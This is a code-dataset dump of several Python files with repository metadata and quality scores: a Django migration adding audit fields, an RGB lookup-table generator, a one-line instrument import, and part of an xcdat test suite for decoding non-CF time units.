hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9f8697580540d8d34809d9765dc1ccb0eb61128b
| 5,873
|
py
|
Python
|
web/transiq/owner/migrations/0019_auto_20180619_1643.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | null | null | null |
web/transiq/owner/migrations/0019_auto_20180619_1643.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | 14
|
2020-06-05T23:06:45.000Z
|
2022-03-12T00:00:18.000Z
|
web/transiq/owner/migrations/0019_auto_20180619_1643.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.0.5 on 2018-06-19 16:43
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('owner', '0018_auto_20180513_1844'),
]
operations = [
migrations.RemoveField(
model_name='fuelcard',
name='update_on',
),
migrations.RemoveField(
model_name='fuelcardtransaction',
name='update_on',
),
migrations.AddField(
model_name='fuelcard',
name='changed_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='fuel_card_changed_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='fuelcard',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='fuel_card_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='fuelcard',
name='deleted',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='fuelcard',
name='deleted_on',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='fuelcard',
name='updated_on',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='fuelcardtransaction',
name='changed_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='fuel_card_transaction_changed_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='fuelcardtransaction',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='fuel_card_transaction_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='fuelcardtransaction',
name='deleted',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='fuelcardtransaction',
name='deleted_on',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='fuelcardtransaction',
name='updated_on',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='historicalvehicle',
name='created_by',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehicle',
name='deleted',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='historicalvehicle',
name='deleted_on',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='owner',
name='changed_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='owner_changed_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='owner',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='owner_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='owner',
name='deleted',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='owner',
name='deleted_on',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='route',
name='changed_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='route_changed_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='route',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='route_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='route',
name='deleted',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='route',
name='deleted_on',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='vehicle',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='owner_vehicle_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehicle',
name='deleted',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='vehicle',
name='deleted_on',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='vehicle',
name='changed_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='owner_vehicle_changed_by', to=settings.AUTH_USER_MODEL),
),
]
| 39.153333
| 175
| 0.609739
| 593
| 5,873
| 5.819562
| 0.114671
| 0.070414
| 0.159954
| 0.187772
| 0.87337
| 0.87337
| 0.841205
| 0.796291
| 0.78528
| 0.770791
| 0
| 0.007294
| 0.276349
| 5,873
| 149
| 176
| 39.416107
| 0.804706
| 0.007662
| 0
| 0.846154
| 1
| 0
| 0.133196
| 0.023172
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020979
| 0
| 0.041958
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9f9f4179d32df33c98bc1e956c00f11113b2fb78
| 1,438
|
py
|
Python
|
tools/gen_rgb2rgb.py
|
jibonaronno/OpenMV-openmv
|
ec7bca0a3d0407f632d86b57ac2bdc6dc84f0252
|
[
"MIT"
] | 6
|
2017-05-24T06:51:37.000Z
|
2020-07-04T16:36:29.000Z
|
util/gen_rgb2rgb.py
|
guohuijiang1234/openmv
|
9c3e9109ec1a2b68bb34107557945bfa379d3a0e
|
[
"MIT"
] | 2
|
2018-11-13T06:47:24.000Z
|
2019-05-15T06:21:55.000Z
|
util/gen_rgb2rgb.py
|
guohuijiang1234/openmv
|
9c3e9109ec1a2b68bb34107557945bfa379d3a0e
|
[
"MIT"
] | 1
|
2021-01-08T03:41:16.000Z
|
2021-01-08T03:41:16.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.stdout.write("#include <stdint.h>\n")
sys.stdout.write("const uint8_t rb528_table[32] = {\n")
for i in range(32):
if not (i % 8):
sys.stdout.write(" ")
sys.stdout.write("%3d" % (((i * 255) + 15.5) // 31))
if (i + 1) % 8:
sys.stdout.write(", ")
elif i != 31:
sys.stdout.write(",\n")
else:
sys.stdout.write("\n};\n")
sys.stdout.write("const uint8_t g628_table[64] = {\n")
for i in range(64):
if not (i % 8):
sys.stdout.write(" ")
sys.stdout.write("%3d" % (((i * 255) + 31.5) // 63))
if (i + 1) % 8:
sys.stdout.write(", ")
elif i != 63:
sys.stdout.write(",\n")
else:
sys.stdout.write("\n};\n")
sys.stdout.write("const uint8_t rb825_table[256] = {\n")
for i in range(256):
if not (i % 8):
sys.stdout.write(" ")
sys.stdout.write("%3d" % (((i * 31) + 127.5) // 255))
if (i + 1) % 8:
sys.stdout.write(", ")
elif i != 255:
sys.stdout.write(",\n")
else:
sys.stdout.write("\n};\n")
sys.stdout.write("const uint8_t g826_table[256] = {\n")
for i in range(256):
if not (i % 8):
sys.stdout.write(" ")
sys.stdout.write("%3d" % (((i * 63) + 127.5) // 255))
if (i + 1) % 8:
sys.stdout.write(", ")
elif i != 255:
sys.stdout.write(",\n")
else:
sys.stdout.write("\n};\n")
| 26.62963
| 57
| 0.493046
| 220
| 1,438
| 3.186364
| 0.190909
| 0.32097
| 0.499287
| 0.171184
| 0.834522
| 0.800285
| 0.800285
| 0.763195
| 0.763195
| 0.694722
| 0
| 0.09309
| 0.275382
| 1,438
| 53
| 58
| 27.132075
| 0.579655
| 0.029207
| 0
| 0.695652
| 0
| 0
| 0.167145
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021739
| 0
| 0.021739
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9fa882aad399bea1f2b4f1251055474f8b88a434
| 45
|
py
|
Python
|
Source_Code/Python/labinstrument/SS/CMW500/__init__.py
|
fenglwh/instruments
|
7886158d1ed97fe6bfe372a55f4fca107e834311
|
[
"MIT"
] | null | null | null |
Source_Code/Python/labinstrument/SS/CMW500/__init__.py
|
fenglwh/instruments
|
7886158d1ed97fe6bfe372a55f4fca107e834311
|
[
"MIT"
] | 3
|
2018-09-21T00:57:21.000Z
|
2018-09-21T01:49:40.000Z
|
Source_Code/Python/labinstrument/SS/CMW500/__init__.py
|
fenglwh/instruments
|
7886158d1ed97fe6bfe372a55f4fca107e834311
|
[
"MIT"
] | null | null | null |
from .CMW500_WIFI.CMW500_WIFI import CMW_WIFI
| 45
| 45
| 0.888889
| 8
| 45
| 4.625
| 0.625
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0.066667
| 45
| 1
| 45
| 45
| 0.738095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4ca343867c3d63321e254619ee276e43efce15fa
| 35,933
|
py
|
Python
|
tests/test_dataset.py
|
jasonb5/xcdat
|
4a35d6a6131fe3fec22593f54a9e48b640ceac4f
|
[
"Apache-2.0"
] | null | null | null |
tests/test_dataset.py
|
jasonb5/xcdat
|
4a35d6a6131fe3fec22593f54a9e48b640ceac4f
|
[
"Apache-2.0"
] | null | null | null |
tests/test_dataset.py
|
jasonb5/xcdat
|
4a35d6a6131fe3fec22593f54a9e48b640ceac4f
|
[
"Apache-2.0"
] | null | null | null |
import pathlib
import warnings
import numpy as np
import pytest
import xarray as xr
from tests.fixtures import generate_dataset
from xcdat.dataset import (
_has_cf_compliant_time,
_keep_single_var,
_postprocess_dataset,
_preprocess_non_cf_dataset,
_split_time_units_attr,
decode_non_cf_time,
open_dataset,
open_mfdataset,
)
from xcdat.logger import setup_custom_logger
logger = setup_custom_logger("xcdat.dataset", propagate=True)
class TestOpenDataset:
@pytest.fixture(autouse=True)
def setup(self, tmp_path):
# Create temporary directory to save files.
dir = tmp_path / "input_data"
dir.mkdir()
self.file_path = f"{dir}/file.nc"
def test_non_cf_compliant_time_is_not_decoded(self):
ds = generate_dataset(cf_compliant=False, has_bounds=True)
ds.to_netcdf(self.file_path)
result = open_dataset(self.file_path, decode_times=False)
expected = generate_dataset(cf_compliant=False, has_bounds=True)
assert result.identical(expected)
def test_non_cf_compliant_time_is_decoded(self):
ds = generate_dataset(cf_compliant=False, has_bounds=False)
ds.to_netcdf(self.file_path)
result = open_dataset(self.file_path, data_var="ts")
# Generate an expected dataset with decoded non-CF compliant time units.
expected = generate_dataset(cf_compliant=True, has_bounds=True)
expected_time_data = np.array(
[
"2000-01-01T00:00:00.000000000",
"2000-02-01T00:00:00.000000000",
"2000-03-01T00:00:00.000000000",
"2000-04-01T00:00:00.000000000",
"2000-05-01T00:00:00.000000000",
"2000-06-01T00:00:00.000000000",
"2000-07-01T00:00:00.000000000",
"2000-08-01T00:00:00.000000000",
"2000-09-01T00:00:00.000000000",
"2000-10-01T00:00:00.000000000",
"2000-11-01T00:00:00.000000000",
"2000-12-01T00:00:00.000000000",
"2001-01-01T00:00:00.000000000",
"2001-02-01T00:00:00.000000000",
"2001-03-01T00:00:00.000000000",
],
dtype="datetime64[ns]",
)
expected["time"] = xr.DataArray(
name="time",
data=expected_time_data,
dims="time",
attrs={
"units": "months since 2000-01-01",
"calendar": "standard",
"axis": "T",
"long_name": "time",
"standard_name": "time",
"bounds": "time_bnds",
},
)
expected.time_bnds.data[:] = np.array(
[
["1999-12-16T12:00:00.000000000", "2000-01-16T12:00:00.000000000"],
["2000-01-16T12:00:00.000000000", "2000-02-15T12:00:00.000000000"],
["2000-02-15T12:00:00.000000000", "2000-03-16T12:00:00.000000000"],
["2000-03-16T12:00:00.000000000", "2000-04-16T00:00:00.000000000"],
["2000-04-16T00:00:00.000000000", "2000-05-16T12:00:00.000000000"],
["2000-05-16T12:00:00.000000000", "2000-06-16T00:00:00.000000000"],
["2000-06-16T00:00:00.000000000", "2000-07-16T12:00:00.000000000"],
["2000-07-16T12:00:00.000000000", "2000-08-16T12:00:00.000000000"],
["2000-08-16T12:00:00.000000000", "2000-09-16T00:00:00.000000000"],
["2000-09-16T00:00:00.000000000", "2000-10-16T12:00:00.000000000"],
["2000-10-16T12:00:00.000000000", "2000-11-16T00:00:00.000000000"],
["2000-11-16T00:00:00.000000000", "2000-12-16T12:00:00.000000000"],
["2000-12-16T12:00:00.000000000", "2001-01-16T12:00:00.000000000"],
["2001-01-16T12:00:00.000000000", "2001-02-15T00:00:00.000000000"],
["2001-02-15T00:00:00.000000000", "2001-03-15T00:00:00.000000000"],
],
dtype="datetime64[ns]",
)
expected.time.encoding = {
# Set source as result source because it changes every test run.
"source": result.time.encoding["source"],
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": "months since 2000-01-01",
"calendar": "standard",
}
assert result.identical(expected)
assert result.time.encoding == expected.time.encoding
def test_preserves_lat_and_lon_bounds_if_they_exist(self):
ds = generate_dataset(cf_compliant=True, has_bounds=True)
# Suppress UserWarning regarding missing time.encoding "units" because
# it is not relevant to this test.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ds.to_netcdf(self.file_path)
result = open_dataset(self.file_path, data_var="ts")
expected = ds.copy()
assert result.identical(expected)
def test_keeps_specified_var(self):
ds = generate_dataset(cf_compliant=True, has_bounds=True)
# Create a modified version of the Dataset with a new var
ds_mod = ds.copy()
ds_mod["tas"] = ds_mod.ts.copy()
# Suppress UserWarning regarding missing time.encoding "units" because
# it is not relevant to this test.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ds_mod.to_netcdf(self.file_path)
result = open_dataset(self.file_path, data_var="ts")
expected = ds.copy()
assert result.identical(expected)
class TestOpenMfDataset:
@pytest.fixture(autouse=True)
def setUp(self, tmp_path):
# Create temporary directory to save files.
dir = tmp_path / "input_data"
dir.mkdir()
self.file_path1 = f"{dir}/file1.nc"
self.file_path2 = f"{dir}/file2.nc"
def test_non_cf_compliant_time_is_not_decoded(self):
ds1 = generate_dataset(cf_compliant=False, has_bounds=True)
ds1.to_netcdf(self.file_path1)
ds2 = generate_dataset(cf_compliant=False, has_bounds=True)
ds2 = ds2.rename_vars({"ts": "tas"})
ds2.to_netcdf(self.file_path2)
result = open_mfdataset([self.file_path1, self.file_path2], decode_times=False)
expected = ds1.merge(ds2)
assert result.identical(expected)
def test_non_cf_compliant_time_is_decoded(self):
ds1 = generate_dataset(cf_compliant=False, has_bounds=False)
ds2 = generate_dataset(cf_compliant=False, has_bounds=False)
ds2 = ds2.rename_vars({"ts": "tas"})
ds1.to_netcdf(self.file_path1)
ds2.to_netcdf(self.file_path2)
result = open_mfdataset(
[self.file_path1, self.file_path2],
data_var="ts",
)
# Generate an expected dataset, which is a combination of both datasets
# with decoded time units and coordinate bounds.
expected = generate_dataset(cf_compliant=True, has_bounds=True)
expected_time_data = np.array(
[
"2000-01-01T00:00:00.000000000",
"2000-02-01T00:00:00.000000000",
"2000-03-01T00:00:00.000000000",
"2000-04-01T00:00:00.000000000",
"2000-05-01T00:00:00.000000000",
"2000-06-01T00:00:00.000000000",
"2000-07-01T00:00:00.000000000",
"2000-08-01T00:00:00.000000000",
"2000-09-01T00:00:00.000000000",
"2000-10-01T00:00:00.000000000",
"2000-11-01T00:00:00.000000000",
"2000-12-01T00:00:00.000000000",
"2001-01-01T00:00:00.000000000",
"2001-02-01T00:00:00.000000000",
"2001-03-01T00:00:00.000000000",
],
dtype="datetime64[ns]",
)
expected["time"] = xr.DataArray(
name="time",
data=expected_time_data,
dims="time",
attrs={
"units": "months since 2000-01-01",
"calendar": "standard",
"axis": "T",
"long_name": "time",
"standard_name": "time",
"bounds": "time_bnds",
},
)
expected.time_bnds.data[:] = np.array(
[
["1999-12-16T12:00:00.000000000", "2000-01-16T12:00:00.000000000"],
["2000-01-16T12:00:00.000000000", "2000-02-15T12:00:00.000000000"],
["2000-02-15T12:00:00.000000000", "2000-03-16T12:00:00.000000000"],
["2000-03-16T12:00:00.000000000", "2000-04-16T00:00:00.000000000"],
["2000-04-16T00:00:00.000000000", "2000-05-16T12:00:00.000000000"],
["2000-05-16T12:00:00.000000000", "2000-06-16T00:00:00.000000000"],
["2000-06-16T00:00:00.000000000", "2000-07-16T12:00:00.000000000"],
["2000-07-16T12:00:00.000000000", "2000-08-16T12:00:00.000000000"],
["2000-08-16T12:00:00.000000000", "2000-09-16T00:00:00.000000000"],
["2000-09-16T00:00:00.000000000", "2000-10-16T12:00:00.000000000"],
["2000-10-16T12:00:00.000000000", "2000-11-16T00:00:00.000000000"],
["2000-11-16T00:00:00.000000000", "2000-12-16T12:00:00.000000000"],
["2000-12-16T12:00:00.000000000", "2001-01-16T12:00:00.000000000"],
["2001-01-16T12:00:00.000000000", "2001-02-15T00:00:00.000000000"],
["2001-02-15T00:00:00.000000000", "2001-03-15T00:00:00.000000000"],
],
dtype="datetime64[ns]",
)
expected.time.encoding = {
# Set source as result source because it changes every test run.
"source": result.time.encoding["source"],
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": "months since 2000-01-01",
"calendar": "standard",
}
assert result.identical(expected)
assert result.time.encoding == expected.time.encoding
def test_keeps_specified_var(self):
ds1 = generate_dataset(cf_compliant=True, has_bounds=True)
ds2 = generate_dataset(cf_compliant=True, has_bounds=True)
ds2 = ds2.rename_vars({"ts": "tas"})
# Suppress UserWarning regarding missing time.encoding "units" because
# it is not relevant to this test.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ds1.to_netcdf(self.file_path1)
ds2.to_netcdf(self.file_path2)
result = open_mfdataset([self.file_path1, self.file_path2], data_var="ts")
# Generate an expected dataset with decoded non-CF compliant time units.
expected = generate_dataset(cf_compliant=True, has_bounds=True)
assert result.identical(expected)
class TestHasCFCompliantTime:
@pytest.fixture(autouse=True)
def setUp(self, tmp_path):
# Create temporary directory to save files.
self.dir = tmp_path / "input_data"
self.dir.mkdir()
# Paths to the dummy datasets.
self.file_path = f"{self.dir}/file.nc"
def test_non_cf_compliant_time(self):
# Generate dummy dataset with non-CF compliant time units
ds = generate_dataset(cf_compliant=False, has_bounds=False)
ds.to_netcdf(self.file_path)
result = _has_cf_compliant_time(self.file_path)
# Check that False is returned when the dataset has non-cf_compliant time
assert result is False
def test_no_time_axis(self):
# Generate dummy dataset with CF compliant time
ds = generate_dataset(cf_compliant=True, has_bounds=False)
# remove time axis
ds = ds.isel(time=0)
ds = ds.squeeze(drop=True)
ds = ds.reset_coords()
ds = ds.drop_vars("time")
ds.to_netcdf(self.file_path)
result = _has_cf_compliant_time(self.file_path)
# Check that None is returned when there is no time axis
assert result is None
def test_glob_cf_compliant_time(self):
# Generate dummy datasets with CF compliant time
ds = generate_dataset(cf_compliant=True, has_bounds=False)
ds.to_netcdf(self.file_path)
result = _has_cf_compliant_time(f"{self.dir}/*.nc")
# Check that the wildcard path input is correctly evaluated
assert result is True
def test_list_cf_compliant_time(self):
# Generate dummy datasets with CF compliant time units
ds = generate_dataset(cf_compliant=True, has_bounds=False)
ds.to_netcdf(self.file_path)
flist = [self.file_path, self.file_path, self.file_path]
result = _has_cf_compliant_time(flist)
# Check that the list input is correctly evaluated
assert result is True
def test_cf_compliant_time_with_string_path(self):
# Generate dummy dataset with CF compliant time units
ds = generate_dataset(cf_compliant=True, has_bounds=False)
ds.to_netcdf(self.file_path)
result = _has_cf_compliant_time(self.file_path)
# Check that True is returned when the dataset has cf_compliant time
assert result is True
def test_cf_compliant_time_with_pathlib_path(self):
# Generate dummy dataset with CF compliant time units
ds = generate_dataset(cf_compliant=True, has_bounds=False)
ds.to_netcdf(self.file_path)
result = _has_cf_compliant_time(pathlib.Path(self.file_path))
# Check that True is returned when the dataset has cf_compliant time
assert result is True
def test_cf_compliant_time_with_list_of_list_of_strings(self):
# Generate dummy dataset with CF compliant time units
ds = generate_dataset(cf_compliant=True, has_bounds=False)
ds.to_netcdf(self.file_path)
result = _has_cf_compliant_time([self.file_path])
# Check that True is returned when the dataset has cf_compliant time
assert result is True
def test_cf_compliant_time_with_list_of_list_of_pathlib_paths(self):
# Generate dummy dataset with CF compliant time units
ds = generate_dataset(cf_compliant=True, has_bounds=False)
ds.to_netcdf(self.file_path)
result = _has_cf_compliant_time([[pathlib.Path(self.file_path)]])
# Check that True is returned when the dataset has cf_compliant time
assert result is True
class TestDecodeNonCFTimeUnits:
@pytest.fixture(autouse=True)
def setup(self):
time = xr.DataArray(
name="time",
data=[1, 2, 3],
dims=["time"],
attrs={
"bounds": "time_bnds",
"axis": "T",
"long_name": "time",
"standard_name": "time",
"calendar": "noleap",
},
)
time_bnds = xr.DataArray(
name="time_bnds",
data=[[0, 1], [1, 2], [2, 3]],
dims=["time", "bnds"],
)
time_bnds.encoding = {
"zlib": False,
"shuffle": False,
"complevel": 0,
"fletcher32": False,
"contiguous": False,
"chunksizes": (1, 2),
"source": "None",
"original_shape": (1980, 2),
"dtype": np.dtype("float64"),
}
self.ds = xr.Dataset({"time": time, "time_bnds": time_bnds})
def test_raises_error_if_function_is_called_on_already_decoded_cf_compliant_dataset(
self,
):
ds = generate_dataset(cf_compliant=True, has_bounds=True)
with pytest.raises(KeyError):
decode_non_cf_time(ds)
def test_decodes_months_with_a_reference_date_at_the_start_of_the_month(self):
ds = self.ds.copy()
ds.time.attrs["units"] = "months since 2000-01-01"
result = decode_non_cf_time(ds)
expected = xr.Dataset(
{
"time": xr.DataArray(
name="time",
data=np.array(
["2000-02-01", "2000-03-01", "2000-04-01"],
dtype="datetime64",
),
dims=["time"],
attrs=ds.time.attrs,
),
"time_bnds": xr.DataArray(
name="time_bnds",
data=np.array(
[
["2000-01-01", "2000-02-01"],
["2000-02-01", "2000-03-01"],
["2000-03-01", "2000-04-01"],
],
dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
def test_decodes_months_with_a_reference_date_at_the_middle_of_the_month(self):
ds = self.ds.copy()
ds.time.attrs["units"] = "months since 2000-01-15"
result = decode_non_cf_time(ds)
expected = xr.Dataset(
{
"time": xr.DataArray(
name="time",
data=np.array(
["2000-02-15", "2000-03-15", "2000-04-15"],
dtype="datetime64",
),
dims=["time"],
attrs=ds.time.attrs,
),
"time_bnds": xr.DataArray(
name="time_bnds",
data=np.array(
[
["2000-01-15", "2000-02-15"],
["2000-02-15", "2000-03-15"],
["2000-03-15", "2000-04-15"],
],
dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
def test_decodes_months_with_a_reference_date_at_the_end_of_the_month(self):
ds = self.ds.copy()
ds.time.attrs["units"] = "months since 1999-12-31"
result = decode_non_cf_time(ds)
expected = xr.Dataset(
{
"time": xr.DataArray(
name="time",
data=np.array(
["2000-01-31", "2000-02-29", "2000-03-31"],
dtype="datetime64",
),
dims=["time"],
attrs=ds.time.attrs,
),
"time_bnds": xr.DataArray(
name="time_bnds",
data=np.array(
[
["1999-12-31", "2000-01-31"],
["2000-01-31", "2000-02-29"],
["2000-02-29", "2000-03-31"],
],
